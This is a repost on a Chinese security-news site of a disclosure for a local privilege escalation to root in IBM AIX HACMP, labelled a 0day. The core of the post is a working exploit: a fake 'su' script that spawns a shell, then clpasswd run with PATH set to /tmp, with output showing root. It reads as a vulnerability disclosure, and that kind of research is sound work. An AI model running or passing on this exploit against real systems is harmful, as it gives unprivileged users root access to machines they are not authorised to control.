IBM AIX High Availability Cluster Multiprocessing (HACMP) Local Privilege Escalation 0day

没穿底裤 2020年1月1日03:54:01评论424 views字数 514阅读1分42秒阅读模式
摘要

少见的AIX的权限提升References:
https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm

少见的AIX的权限提升

IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day  Let's kill some more bugs today and force vendor improvement :)  """ $ cat /tmp/su #!/bin/sh /bin/sh $ chmod +x /tmp/su $ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd # /usr/bin/whoami root """  

References:
https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm

--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
--

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:54:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   IBM AIX High Availability Cluster Multiprocessing (HACMP) Local Privilege Escalation 0dayhttps://cn-sec.com/archives/76457.html

发表评论

匿名网友 填写信息